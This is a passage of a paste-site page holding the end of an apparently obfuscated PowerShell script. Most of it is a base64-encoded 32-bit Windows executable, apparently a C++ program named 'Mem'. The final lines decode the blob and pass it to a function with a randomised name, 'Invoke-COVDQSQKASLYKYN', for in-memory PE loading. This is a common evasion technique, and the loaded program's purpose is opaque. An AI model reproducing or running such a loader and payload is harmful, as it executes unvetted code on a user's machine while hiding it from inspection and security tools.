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gU/dW5jYXVnaHRfZXhjZXB0aW9uQHN0ZEBAWUFfTlhaAKMCP2NpbkBzdGRAQDNWPyRiYXNpY19pc3RyZWFtQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQDFAQQDPAz9pZEA/JGN0eXBlQERAc3RkQEAyVjBsb2NhbGVAMkBBAACOAj9fWGxlbmd0aF9lcnJvckBzdGRAQFlBWFBCREBaABkCP19JcGZ4QD8kYmFzaWNfaXN0cmVhbUBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEBzdGRAQFFBRV9OX05AWgBEAj9fT3NmeEA/JGJhc2ljX29zdHJlYW1ARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEBRQUVYWFoAAGgDP2ZsdXNoQD8kYmFzaWNfb3N0cmVhbUBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEBzdGRAQFFBRUFBVjEyQFhaAMUEP3NldHN0YXRlQD8kYmFzaWNfaW9zQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBAUUFFWEhfTkBaAADYBD9zbmV4dGNAPyRiYXNpY19zdHJlYW1idWZARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEBRQUVIWFoA4QQ/c3B1dG5APyRiYXNpY19zdHJlYW1idWZARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEBRQUVfSlBCRF9KQFoAAM8EP3NnZXRjQD8kYmFzaWNfc3RyZWFtYnVmQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBAUUFFSFhaAADeBD9zcHV0Y0A/JGJhc2ljX3N0cmVhbWJ1ZkBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEBzdGRAQFFBRUhEQFoAwwM/Z2V0bG9jQGlvc19iYXNlQHN0ZEBAUUJFP0FWbG9jYWxlQDJAWFoAtgE/X0dldGNhdEA/JGN0eXBlQERAc3RkQEBTQUlQQVBCVmZhY2V0QGxvY2FsZUAyQFBCVjQyQEBaADEBPz9CaWRAbG9jYWxlQHN0ZEBAUUFFSVhaAABNU1ZDUDE0MC5kbGwAABAAX19DeHhGcmFtZUhhbmRsZXIzAAAiAF9fc3RkX2V4Y2VwdGlvbl9kZXN0cm95ACEAX19zdGRfZXhjZXB0aW9uX2NvcHkAACMAX19zdGRfdGVybWluYXRlAAEAX0N4eFRocm93RXhjZXB0aW9uAABIAG1lbXNldAAANQBfZXhjZXB0X2hhbmRsZXI0X2NvbW1vbgBWQ1JVTlRJTUUxNDAuZGxsAAA7AF9pbnZhbGlkX3BhcmFtZXRlcl9ub2luZm9fbm9yZXR1cm4AAAgAX2NhbGxuZXdoABkAbWFsbG9jAABCAF9zZWhfZmlsdGVyX2V4ZQBEAF9zZXRfYXBwX3R5cGUALgBfX3NldHVzZXJtYXRoZXJyAAAZAF9jb25maWd1cmVfbmFycm93X2FyZ3YAADUAX2luaXRpYWxpemVfbmFycm93X2Vudmlyb25tZW50AAAqAF9nZXRfaW5pdGlhbF9uYXJyb3dfZW52aXJvbm1lbnQAOABfaW5pdHRlcm0AOQBfaW5pdHRlcm1fZQBYAGV4aXQAACUAX2V4aXQAVABfc2V0X2Ztb2RlAAAFAF9fcF9fX2FyZ2MAAAYAX19wX19fYXJndgAAFwBfY2V4aXQAABYAX2NfZXhpdAA/AF9yZWdpc3Rlcl90aHJlYWRfbG9jYWxfZXhlX2F0ZXhpdF9jYWxsYmFjawAACABfY29uZmlndGhyZWFkbG9jYWxlABYAX3NldF9uZXdfbW9kZQABAF9fcF9fY29tbW9kZQAANgBfaW5pdGlhbGl6ZV9vbmV4aXRfdGFibGUAAD4AX3JlZ2lzdGVyX29uZXhpdF9mdW5jdGlvbgAfAF9jcnRfYXRleGl0ABgAZnJlZQAAHQBfY29udHJvbGZwX3MAAGoAdGVybWluYXRlAGFwaS1tcy13aW4tY3J0LXJ1bnRpbWUtbDEtMS0wLmRsbABhcGktbXMtd2luLWNydC1oZWFwLWwxLTEtMC5kbGwAAGFwaS1tcy13aW4tY3J0LW1hdGgtbDEtMS0wLmRsbAAAYXBpLW1zLXdpbi1jcnQtc3RkaW8tbDEtMS0wLmRsbABhcGktbXMtd2luLWNydC1sb2NhbGUtbDEtMS0wLmRsbAAArQVVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAAG0FU2V0VW5oYW5kbGVkRXhjZXB0aW9uRmlsdGVyABcCR2V0Q3VycmVudFByb2Nlc3MAjAVUZXJtaW5hdGVQcm9jZXNzAACGA0lzUHJvY2Vzc29yRmVhdHVyZVByZXNlbnQATQRRdWVye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"
- [Byte[]]$PEBytes = [Byte[]][Convert]::FromBase64String($PEBytes32)
- Invoke-COVDQSQKASLYKYN -PEBytes $PEBytes
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement